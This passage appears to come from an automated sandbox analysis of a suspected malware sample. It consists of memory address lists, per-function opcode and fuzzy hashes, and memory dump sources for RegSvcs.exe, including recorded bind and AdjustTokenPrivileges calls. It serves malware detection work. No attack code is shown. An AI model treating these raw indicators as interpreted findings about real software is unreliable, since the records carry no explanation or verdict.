0x011d87ac
0x011d87ae
0x011d87b0
0x011d87b2
0x011d87b3
0x011d87b5
0x011d87b8
0x011d87ba
0x011d87bc
0x011d87be
0x011d87c1
0x011d87c4
0x011d87c5
0x011d87c6
0x011d87cb
0x011d87cd
0x011d87d0
0x011d87d1
0x011d87d4
0x011d87d9
0x011d87db
0x011d87de
0x011d87df
0x011d87e2
0x011d87e3
0x011d87e5
0x011d87e8
0x011d87e8
0x011d87ed
0x011d87f0
0x011d87f1
0x011d87f3
0x011d87f4
0x011d87f6
0x011d87f9
0x011d87ff
0x011d8802
0x011d8804
0x011d8807
0x011d880d
0x011d8810
0x011d8812
0x011d8815
0x011d8817
0x011d8817
0x011d881a
0x011d881c
0x011d881e
0x011d8820
0x011d8822
0x011d8823
0x011d8826
0x011d8827
0x011d8828
0x011d882f
0x011d8831
0x011d8837
0x011d883d
0x011d883f
0x011d8842
0x011d8843
0x011d8845
0x011d8847
0x011d8849
0x011d884b
0x011d884b
0x011d884d
0x011d8854
0x011d8859
0x011d885f
0x011d8860
0x011d8862
0x011d8863
0x011d8865
0x011d8867
0x011d8869
0x011d8869
0x011d886c
0x011d886e
0x011d886f
0x011d8872
0x011d8874
0x011d8874
0x011d8875
0x011d8877
0x011d887a
0x011d887b
0x011d887d
0x011d8880
0x011d8882
0x011d8884
0x011d8885
0x011d8887
0x011d8889
0x011d888b
0x011d888e
0x011d8890
0x011d8892
0x011d8893
0x011d8899
0x011d88a1
0x011d88a3
0x011d88a5
0x011d88a7
0x011d88af
0x011d88b3
0x011d88b5
0x011d88bb
0x011d88bd
0x011d88c0
0x011d88c5
0x011d88c7
0x011d88c9
0x011d88cb
0x011d88ce
0x011d88d3
0x011d88d5
0x011d88d7
0x011d88d9
0x011d88db
0x011d88e0
0x011d88e1
0x011d88e3
0x011d88e5
0x011d88e7
0x011d88e9
0x011d88ef
0x011d88f1
0x011d88f3
0x011d88f5
0x011d88f7
0x011d88fe
0x011d8900
0x011d8902
0x011d8904
0x011d8909
0x011d890b
0x011d890d
0x011d890f
0x011d8911
0x011d8913
0x011d8918
0x011d8919
0x011d891b
0x011d891d
0x011d891f
0x011d8922
0x011d8925
0x011d892b
0x011d892f
0x011d8934
0x011d8936
0x011d8938
0x011d893a
0x011d893c
0x011d893d
0x011d893f
0x011d8941
0x011d8943
0x011d8948
0x011d894f
0x011d8951
0x011d8954
0x011d8956
0x011d8958
0x011d895d
0x011d8963
0x011d8965
0x011d8967
0x011d896e
0x011d8970
0x011d8972
0x011d8974
0x011d8977
0x011d8979
0x011d897c
0x011d897e
0x011d8980
0x011d8982
0x011d8985
0x011d8987
0x011d898a
0x011d898c
0x011d898e
0x011d8990
0x011d8996
0x011d899b
0x011d899d
0x011d899f
0x011d89a4
0x011d89a6
0x011d89a8
0x011d89aa
0x011d89ab
0x011d89ae
0x011d89af
0x011d89b1
0x011d89b5
0x011d89b9
0x011d89bb
0x011d89c3
0x011d89c5
0x011d89c7
0x011d89ca
0x011d89cb
0x011d89ce
0x011d89d0
0x011d89d2
0x011d89d7
0x011d89de
0x011d89e0
0x011d89e2
0x011d89e3
0x011d89e5
0x011d89ea
0x011d89ec
0x011d89ee
0x011d89f0
0x011d89f4
0x011d89f5
0x011d89f6
0x011d89fb
0x011d89fd
0x011d89fd
0x011d8a00
0x011d8a03
0x011d8a03
0x011d8a04
0x011d8a09
0x011d8a0b
0x011d8a0d
0x011d8a11
0x011d8a13
0x011d8a16
0x011d8a18
0x011d8a1a
0x011d8a1c
0x011d8a21
0x011d8a24
0x011d8a24
0x011d8a26
0x011d8a28
0x011d8a2a
0x011d8a2d
0x011d8a2e
0x011d8a30
0x011d8a32
0x011d8a34
0x011d8a36
0x011d8a39
0x011d8a3e
0x011d8a3f
0x011d8a41
0x011d8a43
0x011d8a45
0x011d8a47
0x011d8a4f
0x011d8a51
0x011d8a53
0x011d8a56
0x011d8a57
0x011d8a5a
0x011d8a5c
0x011d8a5e
0x011d8a60
0x011d8a64
0x011d8a66
0x011d8a68
0x011d8a6b
0x011d8a6b
0x011d8a6d
0x011d8a6f
0x011d8a71
0x011d8a73
0x011d8a75
0x011d8a79
0x011d8a7b
0x011d8a7d
0x011d8a80
0x011d8a81
0x011d8a82
0x011d8a8b
0x011d8a8e
0x011d8a8f
0x011d8a91
0x011d8a95
0x011d8a97
0x011d8a99
0x011d8a9b
0x011d8a9e
0x011d8aa3
0x011d8aa5
0x011d8aa7
0x011d8aad
0x011d8ab4
0x011d8ab6
0x011d8ab7
0x011d8abc
0x011d8abe
0x011d8ac0
0x011d8ac2
0x011d8ac4
0x011d8acb
0x011d8ace
0x011d8ad0
0x011d8ad1
0x011d8ad1
0x011d8ad4
0x011d8ad8
0x011d8ad9
0x011d8adc
0x011d8adc
0x011d8add
0x011d8adf
0x011d8ae1
0x011d8ae3
0x011d8ae9
0x011d8aeb
0x011d8aed
0x011d8aed
0x011d8af0
0x011d8af4
0x011d8af6
0x011d8af8
0x011d8af8
0x011d8af9
0x011d8afb
0x011d8afe
0x011d8aff
0x011d8b01
0x011d8b08
0x011d8b0a
0x011d8b0b
0x011d8b0c
0x011d8b11
0x011d8b12
0x011d8b14
0x011d8b16
0x011d8b18
0x011d8b19
0x011d8b1c
0x011d8b1f
0x011d8b20
0x011d8b22
0x011d8b24
0x011d8b26
0x011d8b27
0x011d8b29
0x011d8b2c
0x011d8b2e
0x011d8b30
0x011d8b32
0x011d8b34
0x011d8b35
0x011d8b38
0x011d8b39
0x011d8b3c
0x011d8b3e
0x011d8b40
0x011d8b44
0x011d8b45
0x011d8b48
0x011d8b49
0x011d8b4a
0x011d8b4c
0x011d8b4e
0x011d8b50
0x011d8b51
0x011d8b54
0x011d8b55
0x011d8b58
0x011d8b5a
0x011d8b5c
0x011d8b63
0x011d8b66
0x011d8b68
0x011d8b6a
0x011d8b6c
0x011d8b6c
0x011d8b6e
0x011d8b70
0x011d8b71
0x011d8b73
0x011d8b74
0x011d8b76
0x011d8b76
0x011d8b77
0x011d8b79
0x011d8b80
0x011d8b82
0x011d8b84
0x011d8b86
0x011d8b88
0x011d8b8b
0x011d8b8c
0x011d8b8d
0x011d8b8f
0x011d8b90
0x011d8b92
0x011d8b94
0x011d8b98
0x011d8b99
0x011d8b9c
0x011d8b9e
0x011d8ba0
0x011d8ba2
0x011d8ba4
0x011d8ba5
0x011d8ba8
0x011d8ba9
0x011d8bab
0x011d8bac
0x011d8bae
0x011d8bb0
0x011d8bb4
0x011d8bb5
0x011d8bb8
0x011d8bba
0x011d8bbc
0x011d8bbe
0x011d8bc0
0x011d8bc2
0x011d8bc4
0x011d8bc5
0x011d8bc7
0x011d8bc8
0x011d8bca
0x011d8bca
0x011d8bcb
0x011d8bcd
0x011d8bd3
0x011d8bd5
0x011d8bd6
0x011d8bd8
0x011d8bda
0x011d8bdc
0x011d8bde
0x011d8be0
0x011d8be1
0x011d8be3
0x011d8be4
0x011d8be6
0x011d8be6
0x011d8be7
0x011d8be9
0x011d8beb
0x011d8bed
0x011d8bf0
0x011d8bf1
0x011d8bf2
0x011d8bf4
0x011d8bf6
0x011d8bf8
0x011d8bfa
0x011d8bfc
0x011d8bfd
0x011d8bff
0x011d8c00
0x011d8c02
0x011d8c02
0x011d8c03
0x011d8c05
0x011d8c07
0x011d8c09
0x011d8c0f
0x011d8c11
0x011d8c13
0x011d8c19
0x011d8c1d
0x011d8c1f
0x011d8c21
0x011d8c23
0x011d8c25
0x011d8c28
0x011d8c2a
0x011d8c2c
0x011d8c2e
0x011d8c30
0x011d8c33
0x011d8c36
0x011d8c38
0x011d8c3a
0x011d8c3c
0x011d8c3e
0x011d8c41
0x011d8c46
0x011d8c48
0x011d8c4b
0x011d8c4d
0x011d8c53
0x011d8c54
0x011d8c56
0x011d8c59
0x011d8c5b
0x011d8c5c
0x011d8c5d
0x011d8c5e
0x011d8c5f
0x011d8c5f
0x011d8c60
0x011d8c63
0x011d8c65
0x011d8c6d
0x011d8c73
0x011d8c76
0x011d8c7d
0x011d8c7e
0x011d8c80
0x011d8c83
0x011d8c89
0x011d8c8c
0x011d8c8e
0x011d8c90
0x011d8c97
0x011d8c9a
0x011d8c9c
0x011d8ca8
0x011d8caa
0x011d8cac
0x011d8cad
0x011d8cb3
0x011d8cb9
0x011d8cbc
0x011d8cc4
0x011d8cc6
0x011d8cc8
0x011d8ccb
0x011d8cce
0x011d8ccf
0x011d8cd1
0x011d8cd2
0x011d8cd4
0x011d8ce0
0x011d8ce2
0x011d8ce4
0x011d8ce8
0x011d8ce9
0x011d8ceb
0x011d8cee
0x011d8cf0
0x011d8cfc
0x011d8cfe
0x011d8d01
0x011d8d05
0x011d8d06
0x011d8d07
0x011d8d0d
0x011d8d17
0x011d8d18
0x011d8d1a
0x011d8d1d
0x011d8d20
0x011d8d21
0x011d8d22
0x011d8d26
0x011d8d28
0x011d8d2e
0x011d8d33
0x011d8d34
0x011d8d36
0x011d8d3f
0x011d8d42
0x011d8d44
0x011d8d4d
0x011d8d50
0x011d8d52
0x011d8d54
0x011d8d5b
0x011d8d5e
0x011d8d60
0x011d8d69
0x011d8d6c
0x011d8d6e
0x011d8d70
0x011d8d74
0x011d8d75
0x011d8d77
0x011d8d7d
0x011d8d80

Memory Dump Source

Source File: 00000004.00000002.2196899347.00000000011D2000.00000020.00020000.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000004.00000002.2196893204.00000000011D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2197059618.0000000001286000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d98b7460223e123317e24dde068dc75af5f7607a661930a572cbef303d8124
Instruction ID: ba143a7ce269aa08cdf7917c075f4a21b5883d72a97a9bdad25893a1de4ad6f1
Opcode Fuzzy Hash: 02d98b7460223e123317e24dde068dc75af5f7607a661930a572cbef303d8124
Instruction Fuzzy Hash: FA02376684E3C19FD7078B348CB56927FB0AF17214B0E46DBC0C1CF4A3E2195A6AC762

Uniqueness

Uniqueness Score: -1.00%

Function 002EE268, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a5a2c38f49d54cbd9c63032eff3e902de9e6e231fa1cde6df5425dad0831489
Instruction ID: bbee00cd0370d28361b6c497456287126bb3d2fc10cfa4dd905c4e4a5982dafc
Opcode Fuzzy Hash: 5a5a2c38f49d54cbd9c63032eff3e902de9e6e231fa1cde6df5425dad0831489
Instruction Fuzzy Hash: B1810674D54258DBDF14DFA6C5805ADFBB6BF89304F24C5AAC818AB30AD7349A42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002E9170, Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c56ebf2e6200a9c1151553211c651af7bfbdd4b5dac60c86b2f789cefcfe9d
Instruction ID: bd8cbe5d8142c36e91b214a8676e99567e11baec9a3ae6ff4c846b341c90a67e
Opcode Fuzzy Hash: 42c56ebf2e6200a9c1151553211c651af7bfbdd4b5dac60c86b2f789cefcfe9d
Instruction Fuzzy Hash: E271CF74E25249EFCB44CFAAD48499DBBF1FF49350F64D49AE419AB250D334AA90CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002E9180, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9111b08dc27d9e7807479287edd494dcdcae6ebedb2efea39331875abe36199b
Instruction ID: 489b9ba179355def22f09b36e1ceafac5c54cf734e3169bcaf1d90933a41ab54
Opcode Fuzzy Hash: 9111b08dc27d9e7807479287edd494dcdcae6ebedb2efea39331875abe36199b
Instruction Fuzzy Hash: C771EDB4E25209EFCB44CFAAC48499DBBF1FF49350F60949AE419AB350D334AA90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B74770, Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ec9bc4f35e8ba029efb727989a080a5d9a64407206a1e5277361ed86ebc6226
Instruction ID: 24fcdc4a11eca54b3ea5abd47204ac610664f989c379e453bb44f928cb4e466d
Opcode Fuzzy Hash: 9ec9bc4f35e8ba029efb727989a080a5d9a64407206a1e5277361ed86ebc6226
Instruction Fuzzy Hash: FF513870D4562ACBDB24CF66C8847A9F7F6FB89310F14D2EAC12DA6610E7705A819F40

Uniqueness

Uniqueness Score: -1.00%

Function 002EA339, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3e79e7f6894954f8105b291dbdd8402522a2911388091af9ca72373923654d
Instruction ID: c6f42182415d7987cf2cc40a0d28670cb3da8a36a2d4fa6335f17c378152dd91
Opcode Fuzzy Hash: 2f3e79e7f6894954f8105b291dbdd8402522a2911388091af9ca72373923654d
Instruction Fuzzy Hash: B4511374D6524ADFCF04CFAAC5809AEFBF1FB89300F5485AAD415AB214D338AA41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002EA348, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e69717bacf5de1c0c213123abb877697d22ce55f6b167c90bb82373329d37f69
Instruction ID: 4c6fee04266cdd873cbffbc010e2f9e5c39b4d853683c13616629748c3544d02
Opcode Fuzzy Hash: e69717bacf5de1c0c213123abb877697d22ce55f6b167c90bb82373329d37f69
Instruction Fuzzy Hash: 13511274D2520ADFCB04CFAAC5809AEFBF1FB89300F6095AAD415BB214D378AA518F55

Uniqueness

Uniqueness Score: -1.00%

Function 00B7497E, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f433ffd99c9e767fc47dc875595646e05013256c15e0374783d9d9d9cd4e683f
Instruction ID: 6f65f833a99837a363811d27c8d7024979cbc4962076b4fa55705a3116304275
Opcode Fuzzy Hash: f433ffd99c9e767fc47dc875595646e05013256c15e0374783d9d9d9cd4e683f
Instruction Fuzzy Hash: 8C511470D5562ACECB24CF64C880BA9F7B1FB99310F1096EAC12EA6610E7705AD1DF44

Uniqueness

Uniqueness Score: -1.00%

Function 002EA571, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 049e00806990eec5c018e072efc082ccf2907dd21eb33af20d2817761ca3d3a8
Instruction ID: facebe63a550d4684362ee1687473e243942e9075827cbbd45693754dacb896d
Opcode Fuzzy Hash: 049e00806990eec5c018e072efc082ccf2907dd21eb33af20d2817761ca3d3a8
Instruction Fuzzy Hash: AE413970D1520ADFCB04CFA6C5814EEFBB1FF89300F6484AAC405AB214D774AA91CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 002EA140, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cc05febd949517869e37fd57658ed45d3da5f5bf51904d829b9848b2e08ad1
Instruction ID: 1e17dc7d6a42c955ffd124d5010413e4222b04dbde4d8a1ee5f080328263ad4a
Opcode Fuzzy Hash: 20cc05febd949517869e37fd57658ed45d3da5f5bf51904d829b9848b2e08ad1
Instruction Fuzzy Hash: E5413471D1424A9FCB44CFA6C5815AEFBB1FF89300F64D46AC415AB214E3786A92CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B74967, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29cd4adad561aea5a3cef3f462ba2177bd3c753318d49f3146548224a47e70e
Instruction ID: 0fdde13edb07d796d74c0b0308338b5b1bd4e5e7eeea66d4611adc000d369c37
Opcode Fuzzy Hash: d29cd4adad561aea5a3cef3f462ba2177bd3c753318d49f3146548224a47e70e
Instruction Fuzzy Hash: D7413470D5662BCECB24CF64D8807ADF7B1FB99310F1096EAC12EA6610E7705AD19F41

Uniqueness

Uniqueness Score: -1.00%

Function 002EA580, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 484b39d3b9b864647bc72914474da8c1a1548fb79751ac981872dcf9307934b6
Instruction ID: c4d3a0ebec0e971b20a333f13d66da0e2f0126e5c84ca10698253f9418517695
Opcode Fuzzy Hash: 484b39d3b9b864647bc72914474da8c1a1548fb79751ac981872dcf9307934b6
Instruction Fuzzy Hash: 16412870D2520ADFCB04CF96C5814EEFBB2FB89300F64946AC415BB214D774AA91CF92

Uniqueness

Uniqueness Score: -1.00%

Function 002EA150, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 206470093ca5d7d3d8830feb93ca4de0c992b968a56dbac8c0b5405512a353d4
Instruction ID: ac0cde96db996d6d452bccb12f35010a07928ccc304eb2c76824f9334697c8d8
Opcode Fuzzy Hash: 206470093ca5d7d3d8830feb93ca4de0c992b968a56dbac8c0b5405512a353d4
Instruction Fuzzy Hash: 63412370D6424A9FCB44CFA6C5815AEFBB1FB88300F60D42AD415BB214D378A691CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002EDCC8, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02448dd1b6ce769b893d461604f6cfc6fd6998d4e53f7f68d6f20da750f6e502
Instruction ID: 0282d58ee1c3fb56fdfa83ae84193fce8abcde9d223ca8bfbee7d061841fe9ac
Opcode Fuzzy Hash: 02448dd1b6ce769b893d461604f6cfc6fd6998d4e53f7f68d6f20da750f6e502
Instruction Fuzzy Hash: 38414270D64649CFDB18CFABC9406AEFBB6BB89300F20C16AD419BB250D7345A12CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00B762C8, Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8056a0d1520b0452f41c6ac3c075c196d5b35dda55a885274d2f94b672dcdf1
Instruction ID: d2bb2b32dfcd9600b0fee8f425108a8af2caa75cf5ea7deec42dbacafb07d1c5
Opcode Fuzzy Hash: b8056a0d1520b0452f41c6ac3c075c196d5b35dda55a885274d2f94b672dcdf1
Instruction Fuzzy Hash: 4C317A70C05618DFDB10CFA8D488BEDBBF5EF0A314F2590A9E42AB3281C7748985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 002E5980, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f7153c1dba83a4b7b304bc817f1220b9c8aba4db52b9be2ee8afd302318bd6
Instruction ID: baf59c357b5a9cabfc01eee21eb01c468692b7d41f0b28a62070fea07abb1c3f
Opcode Fuzzy Hash: a4f7153c1dba83a4b7b304bc817f1220b9c8aba4db52b9be2ee8afd302318bd6
Instruction Fuzzy Hash: F8214D71E156589BEB08CFABDC4469EFBF7AFC9310F18C1BAD408AA265DB3005458B51

Uniqueness

Uniqueness Score: -1.00%

Function 00B763F8, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d79ed6c82de5a1daaddac3293a8b85fbaa8d701704fc9a8f55afd0e7e20854
Instruction ID: 5046b51254ccbf0a01e614ad4f7dfe491a73d664116c405f7c713e2c9ef05458
Opcode Fuzzy Hash: 15d79ed6c82de5a1daaddac3293a8b85fbaa8d701704fc9a8f55afd0e7e20854
Instruction Fuzzy Hash: FC112E70C042599EDB10CFB5D888BFEBFF0AB0A700F2490A9E459B3252D7749A44DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B76408, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9bb1378df2b1c7ffc9c5e58bb7ac36421a38c75db651c0e19e1da1cd3c8cf03
Instruction ID: 0fdcc7f25fa6471bc5e61883c9084044274f28440a839515319c2282340d268d
Opcode Fuzzy Hash: a9bb1378df2b1c7ffc9c5e58bb7ac36421a38c75db651c0e19e1da1cd3c8cf03
Instruction Fuzzy Hash: 28110A70D042199ECB14CFAAD884BEEBFF0AF4A300F149069E459B3251D7748A44DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B70070, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b91b83841f6f155850c50ccaad7ccb498fbd2d6ba51406c8b391e9df2f8474c
Instruction ID: 72eda43fa690c85b8c2a9cfd56fde409f24067f552b2903872d0212b1441dfb2
Opcode Fuzzy Hash: 9b91b83841f6f155850c50ccaad7ccb498fbd2d6ba51406c8b391e9df2f8474c
Instruction Fuzzy Hash: CA111271D15209CBEB48DFAAC9401AEFBF2FFD9300F24C56AC428AB214D73446428F84

Uniqueness

Uniqueness Score: -1.00%

Function 00B706C8, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f822a0d911d371748b8bb3f6d64cd81e3ecfc9c65650a1aa5092a3f23c3ab6b4
Instruction ID: 9f633846d072d5f64b4d12ffae547e9cba4a26ae466e56e800ceb1d8b4a8f263
Opcode Fuzzy Hash: f822a0d911d371748b8bb3f6d64cd81e3ecfc9c65650a1aa5092a3f23c3ab6b4
Instruction Fuzzy Hash: FC11C5B0E11608DBEB58DFAB894059EFBF3AFC8200F24C56AC818AB215DA345A45DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00B706C0, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e51caafb34079040373651744c711622da8e9df32376d891d9382d8d08d8fdaf
Instruction ID: 60ebba0f96afcf5cbf3f59e7bd00f54d02fa61c4c27fedca2742179599a6b8ca
Opcode Fuzzy Hash: e51caafb34079040373651744c711622da8e9df32376d891d9382d8d08d8fdaf
Instruction Fuzzy Hash: 261196B0E11609DFEB58DFAB894459EFAF3AFC8200F24C57AC418AB215DA344A46DF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exe PID: 2696 Parent PID: 2480 RegSvcs.exeCOMMON

Executed Functions

Function 003C2418, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 003C2A3A
_qq, xrefs: 003C2739

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: 645d31d30dc51447ab011e7051e18d6967baa653ccad201c24f6e947a44b71f7
Instruction ID: 6806fd01326bf1f5661f75ccb3911593d6ffe1fbbbca061adc493dd0465baa24
Opcode Fuzzy Hash: 645d31d30dc51447ab011e7051e18d6967baa653ccad201c24f6e947a44b71f7
Instruction Fuzzy Hash: 6312AE30A00215CFDB1ADF65C980BAEB7F6BB86300F65C12EE415EB696DB749D85CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003C8AE8, Relevance: 3.0, Strings: 2, Instructions: 505COMMON

Download Yara Rule

Strings

_qq, xrefs: 003C8E09
_qq, xrefs: 003C910A

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: _qq$_qq
API String ID: 0-1484419985
Opcode ID: ee3139925b1281b05d8dfa6de031747f3f84a2036a2dc0b4845769436a8bad44
Instruction ID: a41cd102c89ae9346f40b29233db37988a4ee2d7b263dad11d18edc44e06ca51
Opcode Fuzzy Hash: ee3139925b1281b05d8dfa6de031747f3f84a2036a2dc0b4845769436a8bad44
Instruction Fuzzy Hash: 1A12BC30A00215CFCB25DF68C884B6DB7F6BB88305F6A856ED012DB650DB74DE86DB50

Uniqueness

Uniqueness Score: -1.00%

Function 003CB410, Relevance: 2.2, Strings: 1, Instructions: 910COMMON

Download Yara Rule

Strings

r, xrefs: 003CBEC4

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 9844657d071ec233dc214115ac146ea22c3e736935d5489c1a463c1dd2a4abfe
Instruction ID: ba23d142804e3340c956165c0915a791ce47a67ae76ab5453e4b013be55d36c0
Opcode Fuzzy Hash: 9844657d071ec233dc214115ac146ea22c3e736935d5489c1a463c1dd2a4abfe
Instruction Fuzzy Hash: 4B823674A00609CFCB15CF68C885AAEFBB2FF88310F158669D45AAB651D734BD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003C38C8, Relevance: 2.0, Strings: 1, Instructions: 765COMMON

Download Yara Rule

Strings

*_qq, xrefs: 003C4095

Memory Dump Source

Source File: 00000007.00000002.2393625133.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Similarity

API ID:
String ID: *_qq
API String ID: 0-2551050454
Opcode ID: 90b3560d16553f01e7fe525eed5ce37dd46a6ba419c1bc962985bc2dda4dead8
Instruction ID: 5d4274e57b9ea95cab382ca0dc1a1ae4d5c91977f92a7eba5f2d9059f58b3387
Opcode Fuzzy Hash: 90b3560d16553f01e7fe525eed5ce37dd46a6ba419c1bc962985bc2dda4dead8
Instruction Fuzzy Hash: 8A52F531A04216CFCB16DF68C880AA9FBB5FF85300B29C5AED449DB656D731ED41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004F253B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E40,5A364AA6,00000000,00000000,00000000,00000000), ref: 004F25CF

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 596bb961342e1d47ed77a9a0ae9632c75a7836ba9ab301970b4954551bc86479
Instruction ID: 7e2371955d7afe91488b98058c514e61c16c8cff093661c482bba9fc1835b0ee
Opcode Fuzzy Hash: 596bb961342e1d47ed77a9a0ae9632c75a7836ba9ab301970b4954551bc86479
Instruction Fuzzy Hash: 83219171509384AFE712CF61CD54F97BFA8EF06310F08849BEA44DB292D268A909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 004F10A3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004F1123

Memory Dump Source

Source File: 00000007.00000002.2393719977.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: bbdbef98f13052bf46db522dec9dd4379557a1a8d2942c7acc3859f72ddfaf53
Instruction ID: f21e101ffbaefdec539c26f364c7c897f4163d23800a7596793620d316313331
Opcode Fuzzy Hash: bbdbef98f13052bf46db522dec9dd4379557a1a8d2942c7acc3859f72ddfaf53
Instruction Fuzzy Hash: FF21D3755093849FDB22CF25DC44B52BFF4EF16310F0884DBEA858B663D2759808DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004F140F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

